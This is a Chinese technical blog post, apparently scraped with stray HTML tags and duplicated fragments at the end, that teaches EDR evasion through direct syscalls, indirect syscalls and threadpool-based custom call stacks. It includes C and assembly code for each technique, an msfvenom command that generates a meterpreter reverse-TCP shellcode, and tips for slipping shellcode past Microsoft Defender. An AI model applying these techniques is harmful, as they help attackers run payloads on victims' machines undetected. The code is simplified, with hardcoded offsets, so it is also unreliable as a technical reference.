从系统调用到自定义堆栈：EDR对抗技术详解<\/h1>

一、概述<\/h2>
本文详细讲解从传统系统调用到自定义堆栈调用的演化过程，涵盖直接系统调用(Direct Syscall)、间接调用(Indirect Syscall)以及自定义堆栈(Custom Call Stack)等技术。这些技术主要用于绕过EDR(终端检测与响应)产品的检测机制。<\/p>

二、系统调用简史<\/h2>

1. Windows API层次结构<\/h3>
Windows操作系统中的API分为三个层次：<\/p>

高级API<\/h4>

面向普通应用开发者<\/li>
功能丰富，易用性强<\/li>
示例：VirtualAlloc<\/code><\/li>
调用路径：WinAPI → ntdll.dll → 内核syscall<\/li>

最容易被EDR Hook的位置<\/li>
<\/ul>
中级API<\/h4>

ntdll.dll中导出的以Nt或Zw开头的函数<\/li>
示例：NtAllocateVirtualMemory<\/code>, NtWriteVirtualMemory<\/code>, NtCreateThreadEx<\/code><\/li>
直接触发内核操作<\/li>
可以绕过仅在kernel32.dll设置Hook的EDR<\/li>
<\/ul>
低级API<\/h4>

真正执行系统调用的部分<\/li>
完全不依赖任何DLL<\/li>
难以被Hook，隐蔽性高<\/li>
需要手动构造系统调用<\/li>
<\/ul>
三、直接系统调用(Direct Syscall)<\/h2>
核心思想<\/h3>
完全跳过ntdll导出的函数封装，直接执行syscall指令<\/p>
实现步骤<\/h3>

提取SSN(系统服务号)<\/li>
构造syscall stub<\/li>
完成参数压栈与寄存器传值<\/li>
直接调用syscall指令<\/li>
<\/ol>
代码实现<\/h3>
ShellCode准备<\/h4>
# 使用msfconsole生成shellcode<\/span>
<\/span><\/span>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span>YOUR_IP LPORT=<\/span>YOUR_PORT -f c
<\/span><\/span><\/code><\/pre>syscalls.h<\/h4>
#pragma once
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>#define STATUS_SUCCESS 0
<\/span><\/span><\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> _UNICODE_STRING {
<\/span><\/span>    USHORT Length;
<\/span><\/span>    USHORT MaximumLength;
<\/span><\/span>    PWSTR  Buffer;
<\/span><\/span>} UNICODE_STRING, *<\/span>PUNICODE_STRING;
<\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> _OBJECT_ATTRIBUTES {
<\/span><\/span>    ULONG           Length;
<\/span><\/span>    HANDLE          RootDirectory;
<\/span><\/span>    PUNICODE_STRING ObjectName;
<\/span><\/span>    ULONG           Attributes;
<\/span><\/span>    PVOID           SecurityDescriptor;
<\/span><\/span>    PVOID           SecurityQualityOfService;
<\/span><\/span>} OBJECT_ATTRIBUTES, *<\/span>POBJECT_ATTRIBUTES;
<\/span><\/span>
<\/span><\/span>typedef<\/span> NTSTATUS<\/span>(NTAPI*<\/span> _NtAllocateVirtualMemory)(
<\/span><\/span>    HANDLE ProcessHandle,
<\/span><\/span>    PVOID*<\/span> BaseAddress,
<\/span><\/span>    ULONG_PTR ZeroBits,
<\/span><\/span>    PSIZE_T RegionSize,
<\/span><\/span>    ULONG AllocationType,
<\/span><\/span>    ULONG Protect
<\/span><\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ 其他Nt函数声明...
<\/span><\/span><\/span><\/code><\/pre>main.c<\/h4>
#include<\/span> "syscalls.h"<\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 动态获取SSN
<\/span><\/span><\/span><\/span>DWORD GetSSN<\/span>(PVOID funcAddress) {
<\/span><\/span>    return<\/span> *<\/span>(PDWORD)((PBYTE)funcAddress +<\/span> 0x4<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 直接系统调用实现
<\/span><\/span><\/span><\/span>NTSTATUS DirectSyscall_NtAllocateVirtualMemory<\/span>(
<\/span><\/span>    HANDLE ProcessHandle,
<\/span><\/span>    PVOID*<\/span> BaseAddress,
<\/span><\/span>    ULONG_PTR ZeroBits,
<\/span><\/span>    PSIZE_T RegionSize,
<\/span><\/span>    ULONG AllocationType,
<\/span><\/span>    ULONG Protect
<\/span><\/span>) {
<\/span><\/span>    \/\/ 获取SSN
<\/span><\/span><\/span><\/span>    DWORD ssn =<\/span> GetSSN(NtAllocateVirtualMemory);
<\/span><\/span>    
<\/span><\/span>    \/\/ 调用汇编实现的syscall stub
<\/span><\/span><\/span><\/span>    return<\/span> NtAllocateVirtualMemory_ASM(
<\/span><\/span>        ProcessHandle, 
<\/span><\/span>        BaseAddress, 
<\/span><\/span>        ZeroBits, 
<\/span><\/span>        RegionSize, 
<\/span><\/span>        AllocationType, 
<\/span><\/span>        Protect, 
<\/span><\/span>        ssn
<\/span><\/span>    );
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>syscalls.asm<\/h4>
.code<\/span>
<\/span><\/span>
<\/span><\/span>NtAllocateVirtualMemory_ASM<\/span> proc<\/span>
<\/span><\/span>    mov<\/span> r10<\/span>, rcx<\/span>
<\/span><\/span>    mov<\/span> eax<\/span>, [rsp<\/span>+<\/span>28<\/span>h<\/span>]    ; 从栈上获取SSN
<\/span><\/span><\/span><\/span>    syscall<\/span>
<\/span><\/span>    ret<\/span>
<\/span><\/span>NtAllocateVirtualMemory_ASM<\/span> endp<\/span>
<\/span><\/span>
<\/span><\/span>end<\/span>
<\/span><\/span><\/code><\/pre>检测风险<\/h3>

syscall指令在非ntdll内存区域调用<\/li>
return指令位于非ntdll区域<\/li>
调用stub、跳转、返回地址集中在同一非系统区域<\/li>
这些特征都是明显的IOC(入侵指标)<\/li>
<\/ul>
四、间接系统调用(Indirect Syscall)<\/h2>
核心改进<\/h3>
syscall和return指令发生在ntdll的内存中，从ntdll内存指向间接系统调用程序集的内存<\/p>
实现要点<\/h3>

不仅记录SSN，还需要记录系统调用指令地址<\/li>
调用路径看起来更合法<\/li>
<\/ul>
代码实现<\/h3>
main.c<\/h4>
\/\/ 获取ntdll中syscall指令地址
<\/span><\/span><\/span><\/span>PVOID GetSyscallAddress<\/span>() {
<\/span><\/span>    HMODULE ntdll =<\/span> GetModuleHandleA("ntdll.dll"<\/span>);
<\/span><\/span>    return<\/span> (PVOID)((PBYTE)GetProcAddress(ntdll, "NtAllocateVirtualMemory"<\/span>) +<\/span> 0x12<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>NTSTATUS IndirectSyscall_NtAllocateVirtualMemory<\/span>(
<\/span><\/span>    HANDLE ProcessHandle,
<\/span><\/span>    PVOID*<\/span> BaseAddress,
<\/span><\/span>    ULONG_PTR ZeroBits,
<\/span><\/span>    PSIZE_T RegionSize,
<\/span><\/span>    ULONG AllocationType,
<\/span><\/span>    ULONG Protect
<\/span><\/span>) {
<\/span><\/span>    DWORD ssn =<\/span> GetSSN(NtAllocateVirtualMemory);
<\/span><\/span>    PVOID syscallAddr =<\/span> GetSyscallAddress();
<\/span><\/span>    
<\/span><\/span>    return<\/span> NtAllocateVirtualMemory_ASM(
<\/span><\/span>        ProcessHandle, 
<\/span><\/span>        BaseAddress, 
<\/span><\/span>        ZeroBits, 
<\/span><\/span>        RegionSize, 
<\/span><\/span>        AllocationType, 
<\/span><\/span>        Protect, 
<\/span><\/span>        ssn, 
<\/span><\/span>        syscallAddr
<\/span><\/span>    );
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>syscalls.asm<\/h4>
NtAllocateVirtualMemory_ASM<\/span> proc<\/span>
<\/span><\/span>    mov<\/span> r10<\/span>, rcx<\/span>
<\/span><\/span>    mov<\/span> eax<\/span>, [rsp<\/span>+<\/span>28<\/span>h<\/span>]    ; SSN
<\/span><\/span><\/span><\/span>    jmp<\/span> qword<\/span> ptr<\/span> [rsp<\/span>+<\/span>30<\/span>h<\/span>] ; 跳转到ntdll中的syscall指令
<\/span><\/span><\/span><\/span>NtAllocateVirtualMemory_ASM<\/span> endp<\/span>
<\/span><\/span><\/code><\/pre>堆栈对比<\/h3>

间接系统调用：调用栈包含ntdll模块<\/li>
直接系统调用：调用栈完全在自定义区域<\/li>
<\/ul>
五、自定义堆栈(Custom Call Stack)<\/h2>
技术背景<\/h3>
现代EDR会分析完整调用链和调用栈，仅靠直接\/间接系统调用仍可能被检测<\/p>
核心原理<\/h3>
利用Windows回调机制(如Threadpool Callback)构建合法调用路径<\/p>
实现步骤<\/h3>

使用TpAllocWork<\/code>注册回调函数<\/li>
在回调函数中构造寄存器和堆栈环境<\/li>
跳转执行Nt函数<\/li>
<\/ol>
参数传递规范<\/h3>

x64调用约定：前4个参数通过RCX,RDX,R8,R9传递<\/li>
其余参数通过栈传递<\/li>
需要预留32字节"homing space"<\/li>
<\/ul>
代码实现<\/h3>
main.c<\/h4>
typedef<\/span> VOID<\/span>(NTAPI*<\/span> _TpAllocWork)(PTP_WORK*<\/span> ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
<\/span><\/span>
<\/span><\/span>VOID WorkCallback<\/span>(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work) {
<\/span><\/span>    \/\/ 从Context获取参数并执行系统调用
<\/span><\/span><\/span><\/span>    SyscallContext*<\/span> ctx =<\/span> (SyscallContext*<\/span>)Context;
<\/span><\/span>    
<\/span><\/span>    \/\/ 执行汇编代码
<\/span><\/span><\/span><\/span>    CustomStack_NtAllocateVirtualMemory(
<\/span><\/span>        ctx-><\/span>ProcessHandle,
<\/span><\/span>        ctx-><\/span>BaseAddress,
<\/span><\/span>        ctx-><\/span>ZeroBits,
<\/span><\/span>        ctx-><\/span>RegionSize,
<\/span><\/span>        ctx-><\/span>AllocationType,
<\/span><\/span>        ctx-><\/span>Protect,
<\/span><\/span>        ctx-><\/span>Ssn,
<\/span><\/span>        ctx-><\/span>SyscallAddr
<\/span><\/span>    );
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> ExecuteWithCustomStack<\/span>() {
<\/span><\/span>    \/\/ 初始化参数
<\/span><\/span><\/span><\/span>    SyscallContext ctx =<\/span> { \/* 填充参数 *\/<\/span> };
<\/span><\/span>    
<\/span><\/span>    \/\/ 获取TpAllocWork地址
<\/span><\/span><\/span><\/span>    HMODULE ntdll =<\/span> GetModuleHandleA("ntdll.dll"<\/span>);
<\/span><\/span>    _TpAllocWork TpAllocWork =<\/span> (_TpAllocWork)GetProcAddress(ntdll, "TpAllocWork"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 创建工作项
<\/span><\/span><\/span><\/span>    PTP_WORK work =<\/span> NULL;
<\/span><\/span>    TpAllocWork(&<\/span>work, WorkCallback, &<\/span>ctx, NULL);
<\/span><\/span>    
<\/span><\/span>    \/\/ 提交工作项
<\/span><\/span><\/span><\/span>    SubmitThreadpoolWork(work);
<\/span><\/span>    WaitForThreadpoolWorkCallbacks(work, FALSE);
<\/span><\/span>    CloseThreadpoolWork(work);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>syscalls.asm<\/h4>
CustomStack_NtAllocateVirtualMemory<\/span> proc<\/span>
<\/span><\/span>    mov<\/span> r10<\/span>, rcx<\/span>
<\/span><\/span>    mov<\/span> eax<\/span>, [rsp<\/span>+<\/span>28<\/span>h<\/span>]    ; SSN
<\/span><\/span><\/span><\/span>    jmp<\/span> qword<\/span> ptr<\/span> [rsp<\/span>+<\/span>30<\/span>h<\/span>] ; 跳转到ntdll中的syscall指令
<\/span><\/span><\/span><\/span>CustomStack_NtAllocateVirtualMemory<\/span> endp<\/span>
<\/span><\/span><\/code><\/pre>调用栈分析<\/h3>

合法起点：ntdll.dll → TppWorkCallback → WorkCallback<\/li>
无RX区域参与或可疑DLL加载<\/li>
大大降低检测可能性<\/li>
<\/ul>
六、对抗Microsoft Defender的额外措施<\/h2>


Shellcode加密<\/strong>：<\/p>

避免使用简单XOR加密<\/li>
使用更复杂的加密算法和密钥<\/li>
<\/ul>
<\/li>

内存权限控制<\/strong>：<\/p>

初始分配使用PAGE_READWRITE<\/code><\/li>
写入后改为PAGE_EXECUTE_READ<\/code><\/li>
避免使用PAGE_EXECUTE_READWRITE<\/code><\/li>
<\/ul>
<\/li>

函数名混淆<\/strong>：<\/p>

加密或动态解析Nt函数名称<\/li>
避免硬编码敏感字符串<\/li>
<\/ul>
<\/li>

代码结构混淆<\/strong>：<\/p>

使用SysWhispers2等工具生成代码<\/li>
使反编译结果与实际结构差异大<\/li>
<\/ul>
<\/li>
<\/ol>
七、总结<\/h2>



技术<\/th>
优点<\/th>
缺点<\/th>
检测难度<\/th>
<\/tr>
<\/thead>


直接系统调用<\/td>
完全绕过用户态Hook<\/td>
调用栈异常明显<\/td>
较易<\/td>
<\/tr>

间接系统调用<\/td>
部分调用栈合法<\/td>
仍可能被完整调用链分析检测<\/td>
中等<\/td>
<\/tr>

自定义堆栈<\/td>
完整合法调用链<\/td>
实现复杂<\/td>
较难<\/td>
<\/tr>
<\/tbody>
<\/table>
在实际对抗中，需要根据目标EDR的能力选择适当的技术组合，并结合其他混淆和反检测措施。<\/p>

技术<\/th>	优点<\/th>	缺点<\/th>	检测难度<\/th> <\/tr> <\/thead>
直接系统调用<\/td>	完全绕过用户态Hook<\/td>	调用栈异常明显<\/td>	较易<\/td> <\/tr>
间接系统调用<\/td>	部分调用栈合法<\/td>	仍可能被完整调用链分析检测<\/td>	中等<\/td> <\/tr>
自定义堆栈<\/td>	完整合法调用链<\/td>	实现复杂<\/td>	较难<\/td> <\/tr> <\/tbody> <\/table> 在实际对抗中，需要根据目标EDR的能力选择适当的技术组合，并结合其他混淆和反检测措施。<\/p>

从系统调用到自定义堆栈：EDR对抗技术详解<\/h1>

二、系统调用简史<\/h2>

1. Windows API层次结构<\/h3> Windows操作系统中的API分为三个层次：<\/p>

三、直接系统调用(Direct Syscall)<\/h2>

核心思想<\/h3> 完全跳过ntdll导出的函数封装，直接执行syscall指令<\/p>

代码实现<\/h3>

四、间接系统调用(Indirect Syscall)<\/h2>

核心改进<\/h3> syscall和return指令发生在ntdll的内存中，从ntdll内存指向间接系统调用程序集的内存<\/p>

代码实现<\/h3>

五、自定义堆栈(Custom Call Stack)<\/h2>

技术背景<\/h3> 现代EDR会分析完整调用链和调用栈，仅靠直接\/间接系统调用仍可能被检测<\/p>

核心原理<\/h3> 利用Windows回调机制(如Threadpool Callback)构建合法调用路径<\/p>

代码实现<\/h3>

1. Windows API层次结构<\/h3>
Windows操作系统中的API分为三个层次：<\/p>

核心思想<\/h3>
完全跳过ntdll导出的函数封装，直接执行syscall指令<\/p>

核心改进<\/h3>
syscall和return指令发生在ntdll的内存中，从ntdll内存指向间接系统调用程序集的内存<\/p>

技术背景<\/h3>
现代EDR会分析完整调用链和调用栈，仅靠直接\/间接系统调用仍可能被检测<\/p>

核心原理<\/h3>
利用Windows回调机制(如Threadpool Callback)构建合法调用路径<\/p>